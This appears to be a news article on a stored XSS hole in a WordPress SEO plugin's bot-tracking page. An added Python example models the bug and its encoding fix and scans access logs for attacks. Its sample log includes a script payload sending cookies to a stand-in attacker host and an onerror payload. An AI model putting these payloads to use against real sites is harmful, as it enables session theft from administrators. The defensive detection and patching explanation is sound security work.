Nasty session stealing hole filled in WordPress All in One SEO plugin

A million sites are at risk. Again. So patch, please. The popular All in One SEO Pack plugin for WordPress has been patched to close a session-stealing hole; the plugin has been downloaded some 30 million times and is in use on about a million sites.

The flaw sits in the plugin's Bot Blocker component. It is a stored cross-site scripting (XSS) bug that can be exploited to steal an administrator's session token or to perform actions in the administrator's name.

Users must upgrade to version 2.3.6.1 to guard against the flaw, which is only exploitable when the plugin's "track blocked bots" setting has been enabled.

Dutch researcher David Vaartjes published a proof of concept showing how sites with that setting enabled can be attacked.

He says an attacker can place malicious JavaScript in a request header such as User-Agent or Referer. The plugin writes the raw header values into the tracked-bots page of the admin dashboard, so the script runs in the browser of any administrator who views that page and, because it executes inside the administrator's authenticated session, can attempt to capture the session token or take actions as that administrator.

“A stored cross-site scripting vulnerability exists in the Bot Blocker functionality of the All in One SEO Pack WordPress plugin,” Vaartjes says.

“Particularly interesting about this issue is that an anonymous user can simply store his XSS payload in the admin dashboard by just visiting the public site with a malformed user agent or referrer header.

“If the ‘track blocked bots’ setting is [deliberately] enabled, blocked requests are logged in that HTML page without proper sanitisation or output encoding, allowing XSS.”

Proof-of-concept XSS demo
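The attack shape described above is easy to model: a request's User-Agent or Referer is written into an HTML table without output encoding, and an administrator later loads that table. The following Python is an added example written for this page; it is not the plugin's PHP code and the log lines in it are constructed, not taken from any real site. It shows the vulnerable rendering beside an encoded one, and a small Apache combined-log scanner that flags requests whose headers carry markup, which is the signature of an exploitation attempt against a hole of this kind.

```python
import html
import re

# Constructed sample Apache "combined" log: one ordinary request, one with
# a script payload in the User-Agent, one with a payload in the Referer.
# These lines are made up for this example.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jul/2016:10:01:02 +0000] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.7 - - [10/Jul/2016:10:02:15 +0000] "GET / HTTP/1.1" 403 210 "-" "<script>fetch('https://evil.example/?c='+document.cookie)</script>"
198.51.100.8 - - [10/Jul/2016:10:03:44 +0000] "GET /wp-login.php HTTP/1.1" 200 1200 "http://x/<img src=x onerror=alert(1)>" "BadBot/1.0"
"""

# %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-agent}i"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Heuristic markers of HTML or JavaScript injected into a header value:
# an opening/closing tag, an on*= event handler, or a javascript: URL.
XSS_MARKERS = re.compile(r'<\s*/?\s*[a-z]|\bon[a-z]+\s*=|javascript:', re.IGNORECASE)


def parse_combined(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def find_header_injection(log_text):
    """Return (ip, field, value) for each request whose Referer or User-Agent
    looks like it carries markup - the attempted-exploitation signature."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_combined(line)
        if rec is None:
            continue
        for field in ("referer", "ua"):
            if XSS_MARKERS.search(rec[field]):
                hits.append((rec["ip"], field, rec[field]))
    return hits


def render_row_vulnerable(rec):
    """Model of the bug: attacker-controlled header values are dropped
    straight into the admin page's HTML, so any tag in them is live."""
    return "<tr><td>%s</td><td>%s</td><td>%s</td></tr>" % (
        rec["ip"], rec["referer"], rec["ua"])


def render_row_fixed(rec):
    """Fix: HTML-encode every untrusted value at output time. The text is
    still shown to the admin, but the browser never parses it as markup."""
    return "<tr><td>%s</td><td>%s</td><td>%s</td></tr>" % tuple(
        html.escape(rec[k], quote=True) for k in ("ip", "referer", "ua"))


if __name__ == "__main__":
    for ip, field, value in find_header_injection(SAMPLE_LOG):
        print("suspicious %s from %s: %s" % (field, ip, value))
    rec = parse_combined(SAMPLE_LOG.splitlines()[1])
    print("vulnerable:", render_row_vulnerable(rec))
    print("fixed:     ", render_row_fixed(rec))
```

The scanner is a detection aid, not a patch: a site that logs such a request is at risk only if it is running a vulnerable version with the tracked-bots setting on. The hardening shown is output encoding at the point the value is written into HTML; in a WordPress plugin the equivalent call is esc_html() (or esc_attr() inside attributes), applied to every header-derived string before it reaches the page.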

WordPress sites are a favourite for attackers: scores of exploits target the core CMS, and many more target the third-party plugins that extend it. Plenty of admins patch neither the CMS nor their plugins, or patch the CMS and neglect plugins that ship fixes on their own cycles. Whatever the reason patches are missed, compromised WordPress sites often end up serving as command-and-control infrastructure and as hosts for exploit kits and drive-by downloads.

Source: http://www.theregister.co.uk/
